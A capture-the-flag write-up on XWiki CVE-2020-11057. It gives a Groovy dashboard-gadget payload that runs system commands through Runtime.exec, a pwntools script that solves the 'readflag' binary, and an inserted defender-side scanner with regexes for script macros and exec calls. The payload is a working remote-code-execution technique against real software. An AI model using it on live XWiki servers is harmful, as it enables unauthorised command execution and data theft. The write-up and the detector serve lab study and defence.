GACTF: XWiki
Source: EDI安全
01
Links
https://jira.xwiki.org/browse/XWIKI-16960
https://nvd.nist.gov/vuln/detail/CVE-2020-11057
02
Audit
Register a user, log in, and add a gadget on the back-end dashboard.
r = Runtime.getRuntime()
proc = r.exec('dir /');
BufferedReader stdInput1 = new BufferedReader(new InputStreamReader(proc.getInputStream()));
String s1 = null;
while ((s1 = stdInput1.readLine()) != null) { print s1; }
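A defender-side check for the step above, added here as an example and not part of the original write-up or of XWiki's own code: it scans gadget records for script macros and raises the severity when the body spawns a process, as the payload above does. The record layout, the `trusted_authors` parameter and the sample data are constructed assumptions.

```python
import re

# XWiki script macro openers such as {{groovy}} or {{python}}.
SCRIPT_MACRO = re.compile(r"\{\{\s*(groovy|python|velocity)\b[^}]*\}\}", re.I)
# Process-spawning idioms, including the Runtime.getRuntime()/exec pair above.
EXEC_CALL = re.compile(
    r"Runtime\s*\.\s*getRuntime|\.\s*exec\s*\(|ProcessBuilder|\.\s*execute\s*\(\s*\)")

def scan_gadgets(gadgets, trusted_authors=frozenset()):
    """Flag gadget fields that carry script macros written by untrusted authors."""
    findings = []
    for gadget in gadgets:
        if gadget["author"] in trusted_authors:
            continue
        for field, text in gadget.items():
            if field in ("page", "author") or not isinstance(text, str):
                continue
            macros = sorted({m.group(1).lower() for m in SCRIPT_MACRO.finditer(text)})
            if macros:
                findings.append({
                    "page": gadget["page"], "author": gadget["author"],
                    "field": field, "macros": macros,
                    "severity": "high" if EXEC_CALL.search(text) else "review",
                })
    return findings

# Constructed sample records; the field names are assumptions, not an XWiki export format.
SAMPLE_GADGETS = [
    {"page": "XWiki.alice", "author": "XWiki.alice",
     "title": "Team links", "content": "[[Docs>>Main.WebHome]]"},
    {"page": "XWiki.newuser", "author": "XWiki.newuser", "title": "Notes",
     "content": "{{groovy}}r = Runtime.getRuntime(); proc = r.exec('dir /'){{/groovy}}"},
    {"page": "XWiki.bob", "author": "XWiki.bob", "title": "Status",
     "content": "{{velocity}}$xcontext.user{{/velocity}}"},
    {"page": "XWiki.Admin", "author": "XWiki.Admin", "title": "Ops",
     "content": "{{groovy}}println 'ok'{{/groovy}}"},
]

if __name__ == "__main__":
    for finding in scan_gadgets(SAMPLE_GADGETS, trusted_authors={"XWiki.Admin"}):
        print(finding)
```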
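03
Listing the files in the root directory
04
Decoding
Found readflag; used base64 encoding to get the file out.
05
Result
It is basically a little game; I couldn't be bothered to read the algorithm.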
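from pwn import *
import re

context.log_level = 'DEBUG'
io = process("./readflag")
flag = ""
# The binary asks "bigger?" 464 times; answer each round by comparing the two numbers.
for i in range(464):
    io.recvuntil(b"bigger?")
    s = io.recvuntil(b"\n").decode()
    # Pull the two values out of the "<a> : <b>" line.
    t = re.findall(r"(\d.*) : (\d.*)", s)[0]
    print(t)
    if int(t[0]) > int(t[1]):
        io.sendline(b"0")
        flag += "0"
    else:
        io.sendline(b"1")
        flag += "1"
io.close()
# io.interactive()
print(flag)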